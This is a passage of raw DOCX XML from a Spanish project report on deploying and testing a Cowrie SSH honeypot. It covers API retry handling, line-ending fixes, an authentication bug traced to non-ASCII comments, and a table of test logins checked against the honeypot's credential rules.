            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">429 TooManyRequests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Demasiadas peticiones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Duplicar la espera, hasta 10 minutos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Otros 5xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Error temporal de Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reintentar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4xx (límites, permisos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Error de configuración</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Detenerse y avisar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Éxito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Instancia creada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Esperar a RUNNING, mostrar IP y avisar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 9. Tratamiento de las respuestas de la API de OCI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A cada espera se suma un retardo aleatorio de hasta 10 segundos para no enviar peticiones a intervalos exactos. Opcionalmente, el script envía notificaciones push al móvil mediante el servicio ntfy al arrancar, al conseguir la instancia y si se detiene por un error, de modo que el administrador no necesita vigilar la consola. Un fallo al enviar una notificación nunca interrumpe el script.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Normalización de Saltos de Línea</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El desarrollo se realiza desde Windows, donde Git convierte por defecto los saltos de línea de los ficheros de texto al formato de Windows (CRLF). Un script de Bash con ese formato falla en Linux con errores poco descriptivos, como «$'\r': command not found». Para evitarlo, el repositorio incluye un fichero .gitattributes que fuerza el formato de Linux (LF) en los scripts y ficheros de configuración, y el procedimiento de despliegue clona el repositorio directamente en el servidor en lugar de copiar los ficheros desde Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pruebas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Las pruebas se han realizado en dos etapas. La primera valida en un entorno Linux local los componentes que no dependen del servidor cloud: la instalación y configuración de Cowrie, su comportamiento ante un ataque, el analizador y las herramientas auxiliares. La segunda corresponde a las pruebas de la tabla RFTP sobre el servidor desplegado en Hetzner Cloud. Este capítulo documenta ambas etapas y las incidencias detectadas en cada una.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Entorno de Pruebas Local</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Las pruebas locales se ejecutaron en una máquina Linux con Python 3.11, en la que se instaló Cowrie 3.1.0 siguiendo exactamente el mismo procedimiento que aplica el script 02_instalar_cowrie.sh: usuario dedicado sin privilegios, entorno virtual, instalación desde PyPI, inicialización con cowrie init y copia de los ficheros cowrie.cfg y userdb.txt del proyecto. Cowrie se arrancó en primer plano con COWRIE_STDOUT=yes, el mismo modo que utiliza el servicio de systemd.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba de Arranque</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie arrancó sin errores, cargó el módulo de salida JSON y quedó escuchando en el puerto 2222. Al conectarse al puerto, el banner recibido fue SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u5, es decir, la versión configurada en cowrie.cfg y no la que Cowrie trae por defecto. Esto confirma que el fichero de configuración se carga correctamente por encima de los valores predeterminados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Incidencia: Rechazo Silencioso de Todos los Logins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">En la primera prueba de autenticación, Cowrie rechazó todas las credenciales, incluidas las que userdb.txt debía aceptar. El servicio no mostró ningún error al arrancar y seguía respondiendo con normalidad a las conexiones, por lo que desde fuera el honeypot parecía funcionar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La revisión del log de Cowrie mostró una excepción UnicodeDecodeError en el módulo de autenticación: Cowrie 3.1.0 lee el fichero userdb.txt con la codificación ASCII, y los comentarios del fichero contenían tildes y otros caracteres no ASCII. Al fallar la lectura, el módulo no puede cargar ninguna regla y deniega cualquier intento. El error solo aparece en el log en el momento de cada intento de autenticación, no al arrancar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La gravedad de este fallo reside en que es silencioso. Si se hubiese desplegado así, el honeypot habría registrado durante semanas los intentos de fuerza bruta (que se generan antes de la autenticación) pero ningún acceso ni ningún comando, que son precisamente los datos necesarios para el análisis de TTPs y el mapeo MITRE ATT&amp;CK. Probablemente no se habría detectado hasta la fase de análisis, sin margen para repetir la captura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La corrección fue reescribir los comentarios del fichero sin caracteres no ASCII. Como medida preventiva, el script de instalación verifica ahora la codificación del fichero antes de instalarlo y se detiene si encuentra algún carácter no ASCII. El propio fichero incluye un aviso en su cabecera.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ataque Simulado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Con la configuración corregida se ejecutó un ataque simulado mediante un script de Python con la biblioteca Paramiko, reproduciendo el patrón típico de un bot: varios intentos de fuerza bruta con credenciales comunes y, tras obtener acceso, comandos de reconocimiento, un intento de descarga de malware y el borrado del historial.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29"/>
        <w:gridCol w:w="1588"/>
        <w:gridCol w:w="2540"/>
        <w:gridCol w:w="2381"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Contraseña</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1600"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado obtenido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1600"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rechazo (regla !root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rechazado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">123456</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1600"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rechazo (regla !123456)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rechazado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1600"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
